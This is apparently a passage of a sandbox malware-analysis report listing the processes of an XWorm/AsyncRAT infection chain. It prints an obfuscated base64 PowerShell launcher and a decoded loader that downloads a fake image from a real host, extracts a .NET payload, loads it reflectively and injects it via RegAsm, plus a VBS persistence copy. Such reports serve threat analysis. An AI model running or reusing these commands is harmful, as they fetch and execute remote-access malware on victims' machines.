DgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTreaQByDgTreHDgTreDgTreYQB3DgTreHgDgTreLwByDgTreG8DgTrecgByDgTreGUDgTreLwBtDgTreG8DgTreYwDgTreuDgTreHMDgTreZQBwDgTreG8DgTrecgByDgTreGUDgTreaDgTreB0DgTreG4DgTreYQBwDgTreC8DgTreLwDgTre6DgTreHMDgTrecDgTreB0DgTreHQDgTreaDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreMQDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreQwDgTre6DgTreFwDgTreUDgTreByDgTreG8DgTreZwByDgTreGEDgTrebQBEDgTreGEDgTredDgTreBhDgTreFwDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreE4DgTreYQBtDgTreGUDgTreXwBGDgTreGkDgTrebDgTreBlDgTreCcDgTreLDgTreDgTrenDgTreFIDgTreZQBnDgTreEEDgTrecwBtDgTreCcDgTreLDgTreDgTrenDgTreCcDgTreKQDgTrepDgTreH0DgTreIDgTreB9DgTreDgTre==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	3
Start time:	07:53:23
Start date:	23/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	4
Start time:	07:53:24
Start date:	23/04/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links \| Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.irpawx/rorre/moc.seporrehtnap//:sptth' , '1' , 'C:\ProgramData\' , 'Name_File','RegAsm',''))} }"
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	5
Start time:	07:53:32
Start date:	23/04/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Name_File.vbs
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	6
Start time:	07:53:32
Start date:	23/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	7
Start time:	07:53:35
Start date:	23/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x9a0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000007.00000002.3504238257.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000007.00000002.3504238257.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000007.00000002.3520703529.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Target ID:	9
Start time:	07:53:41
Start date:	23/04/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\ProgramData\Name_File.vbs"
Imagebase:	0x7ff6f7700000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true